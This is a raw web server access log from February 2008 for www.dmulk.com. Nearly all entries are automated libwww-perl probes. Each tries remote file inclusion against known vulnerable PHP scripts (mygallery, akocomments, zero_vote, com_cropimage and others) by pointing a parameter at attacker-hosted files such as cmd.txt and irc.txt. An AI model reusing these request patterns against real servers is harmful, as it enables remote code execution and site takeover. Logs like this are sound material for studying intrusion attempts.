195.178.114.10 - - [10/Feb/2008:04:39:21 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.178.114.10 - - [10/Feb/2008:04:39:22 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.178.114.10 - - [10/Feb/2008:04:39:23 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.205.57.2 - - [10/Feb/2008:04:39:38 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:39:40 -0800] "GET /logs/access.log//akocomments.php?mosConfig_absolute_path=http://www.bwa-handball.de/cms/images/banners/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:39:40 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://www.bwa-handball.de/cms/images/banners/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:39:41 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.bwa-handball.de/cms/images/banners/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.10.34 - - [10/Feb/2008:04:39:41 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.34 - - [10/Feb/2008:04:39:42 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.34 - - [10/Feb/2008:04:39:43 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.160.42.74 - - [10/Feb/2008:04:40:00 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.42.74 - - [10/Feb/2008:04:40:00 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.42.74 - - [10/Feb/2008:04:40:00 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.42.74 - - [10/Feb/2008:04:40:06 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.42.74 - - [10/Feb/2008:04:40:06 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.42.74 - - [10/Feb/2008:04:40:06 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.178.114.10 - - [10/Feb/2008:04:40:06 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.178.114.10 - - [10/Feb/2008:04:40:07 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.178.114.10 - - [10/Feb/2008:04:40:07 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.225.253.102 - - [10/Feb/2008:04:40:38 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.179.90.59 - - [10/Feb/2008:04:40:57 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.179.90.59 - - [10/Feb/2008:04:40:57 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.179.90.59 - - [10/Feb/2008:04:40:58 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.40.2 - - [10/Feb/2008:04:41:26 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?page=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [10/Feb/2008:04:41:26 -0800] "GET //skin/zero_vote/error.php?page=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [10/Feb/2008:04:41:26 -0800] "GET /logs//skin/zero_vote/error.php?page=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:41:34 -0800] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://adm-adserver.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:41:34 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://adm-adserver.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:41:34 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://adm-adserver.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.168.15.147 - - [10/Feb/2008:04:41:50 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://203.71.212.3/www/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.40.2 - - [10/Feb/2008:04:41:58 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?file=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [10/Feb/2008:04:41:58 -0800] "GET //skin/zero_vote/error.php?file=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [10/Feb/2008:04:41:58 -0800] "GET /logs//skin/zero_vote/error.php?file=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [10/Feb/2008:04:42:01 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?id=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [10/Feb/2008:04:42:01 -0800] "GET //skin/zero_vote/error.php?id=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [10/Feb/2008:04:42:01 -0800] "GET /logs//skin/zero_vote/error.php?id=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:42:12 -0800] "GET /logs/access.log//akocomments.php?mosConfig_absolute_path=http://adm-adserver.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.124.84 - - [10/Feb/2008:04:42:54 -0800] "GET /logs/access_071225.log/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.124.84 - - [10/Feb/2008:04:42:55 -0800] "GET /club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.124.84 - - [10/Feb/2008:04:42:55 -0800] "GET /logs/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.176.141.31 - - [10/Feb/2008:04:42:57 -0800] "GET /logs/access_071225.log/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.176.141.31 - - [10/Feb/2008:04:42:57 -0800] "GET /club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.176.141.31 - - [10/Feb/2008:04:42:58 -0800] "GET /logs/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
129.125.145.2 - - [10/Feb/2008:04:43:37 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
129.125.145.2 - - [10/Feb/2008:04:43:37 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
129.125.145.2 - - [10/Feb/2008:04:43:38 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:43:58 -0800] "GET /logs/access_080108.log/convert/mvcw.php?step=http://adm-adserver.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:43:58 -0800] "GET /convert/mvcw.php?step=http://adm-adserver.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:43:59 -0800] "GET /logs/convert/mvcw.php?step=http://adm-adserver.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [10/Feb/2008:04:44:17 -0800] "GET //skin/zero_vote/ask_password.php?dir=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.205.57.2 - - [10/Feb/2008:04:45:04 -0800] "GET /logs/access_080122.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [10/Feb/2008:04:45:04 -0800] "GET ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [10/Feb/2008:04:45:05 -0800] "GET /logs////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.171.143.11 - - [10/Feb/2008:04:45:31 -0800] "GET /logs/access_080122.log//myfunctions/mygallerybrowser.php?myPath=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.171.143.11 - - [10/Feb/2008:04:45:31 -0800] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.247.166 - - [10/Feb/2008:04:46:29 -0800] "GET /logs/access_080130.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.186.169.183 - - [10/Feb/2008:04:46:39 -0800] "GET /logs/access_080121.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Feb/2008:04:46:39 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:04:47:40 -0800] "GET /logs/access_080120.log/convert/mvcw.php?step=http://adm-adserver.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.253.102 - - [10/Feb/2008:04:49:22 -0800] "GET /modifyform.html?code=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:04:49:38 -0800] "GET /logs/access_080122.log//myfunctions/mygallerybrowser.php?myPath=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:04:49:38 -0800] "GET //myfunctions/mygallerybrowser.php?myPath=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:04:49:38 -0800] "GET /logs/access_080122.log//myfunctions/mygallerybrowser.php?myPath=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:04:49:38 -0800] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:04:49:38 -0800] "GET //myfunctions/mygallerybrowser.php?myPath=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:04:49:38 -0800] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [10/Feb/2008:04:50:16 -0800] "GET ////?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 200 2964 "-" "libwww-perl/5.65" "www.dmulk.com"
193.238.26.185 - - [10/Feb/2008:04:52:25 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.236 - - [10/Feb/2008:04:52:34 -0800] "GET /minamijewelry/?D=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
124.217.247.166 - - [10/Feb/2008:04:53:37 -0800] "GET /logs/access_071230.log////?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [10/Feb/2008:04:53:37 -0800] "GET ////?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 2964 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [10/Feb/2008:04:53:38 -0800] "GET /logs////?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 34680 "-" "libwww-perl/5.79" "www.dmulk.com"
212.59.15.100 - - [10/Feb/2008:04:54:07 -0800] "GET /logs/access_071225.log/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.59.15.100 - - [10/Feb/2008:04:54:09 -0800] "GET /club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.59.15.100 - - [10/Feb/2008:04:54:09 -0800] "GET /logs/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.158.50 - - [10/Feb/2008:04:54:10 -0800] "GET /logs/access_080106.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://hornydate.co.uk/sys.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
208.186.169.183 - - [10/Feb/2008:04:55:41 -0800] "GET /logs/access_080130.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.53 - - [10/Feb/2008:04:56:24 -0800] "GET /logs/access_080106.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.239.227.171 - - [10/Feb/2008:04:56:31 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.138.141.146 - - [10/Feb/2008:04:56:39 -0800] "GET /logs/access_080121.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.138.141.146 - - [10/Feb/2008:04:56:39 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.138.141.146 - - [10/Feb/2008:04:56:39 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.138.141.146 - - [10/Feb/2008:04:57:14 -0800] "GET /logs/access_071222.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.217.62.202 - - [10/Feb/2008:04:58:09 -0800] "GET /logs/access_071225.log/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.217.62.202 - - [10/Feb/2008:04:58:13 -0800] "GET /club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.217.62.202 - - [10/Feb/2008:04:58:16 -0800] "GET /logs/club_board_eng/skin/zero_vote/setup.php?dir=http://212.78.204.20/everdreams/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:58:59 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.moe.go.th/bic/fileadmin/.md/lako.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:58:59 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.moe.go.th/bic/fileadmin/.md/lako.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:04:59:00 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.moe.go.th/bic/fileadmin/.md/lako.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.253.102 - - [10/Feb/2008:05:00:45 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.253.102 - - [10/Feb/2008:05:00:45 -0800] "GET /logs/modifyform.html?code=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.253.102 - - [10/Feb/2008:05:00:48 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.151 - - [10/Feb/2008:05:00:59 -0800] "GET /logs/?D=A HTTP/1.0" 200 33955 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
146.83.7.3 - - [10/Feb/2008:05:01:43 -0800] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
146.83.7.3 - - [10/Feb/2008:05:01:43 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
146.83.7.3 - - [10/Feb/2008:05:01:44 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.238.26.185 - - [10/Feb/2008:05:02:10 -0800] "GET /logs/access_071222.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.238.26.185 - - [10/Feb/2008:05:02:11 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.209.40 - - [10/Feb/2008:05:03:21 -0800] "GET /logs/access_080120.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.163.195.49 - - [10/Feb/2008:05:03:45 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.163.195.49 - - [10/Feb/2008:05:03:47 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.163.195.49 - - [10/Feb/2008:05:03:49 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.89.137.99 - - [10/Feb/2008:05:06:26 -0800] "GET /logs/access_071230.log/modules/My_eGallery/index.php?basepath=http://h1.ripway.com/fuckkkker/2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [10/Feb/2008:05:06:26 -0800] "GET /modules/My_eGallery/index.php?basepath=http://h1.ripway.com/fuckkkker/2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [10/Feb/2008:05:06:27 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://h1.ripway.com/fuckkkker/2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:05:06:34 -0800] "GET /%5Csaf%5Clib%5CPEAR%5CPhpDocumentor%5CDocumentation%5Ctests%5C559668.php?FORUM[LIB]=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:05:06:35 -0800] "GET /logs/%5Csaf%5Clib%5CPEAR%5CPhpDocumentor%5CDocumentation%5Ctests%5C559668.php?FORUM[LIB]=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
66.225.253.102 - - [10/Feb/2008:05:06:48 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.253.102 - - [10/Feb/2008:05:06:48 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [10/Feb/2008:05:07:01 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.bwa-handball.de/cms/images/banners/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [10/Feb/2008:05:07:13 -0800] "GET /logs/access_071230.log////?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Feb/2008:05:07:14 -0800] "GET /logs////?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 200 34680 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.40.2 - - [10/Feb/2008:05:07:49 -0800] "GET /logs/access_080130.log//modules/agendax/addevent.inc.php?agendax_path=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [10/Feb/2008:05:07:49 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
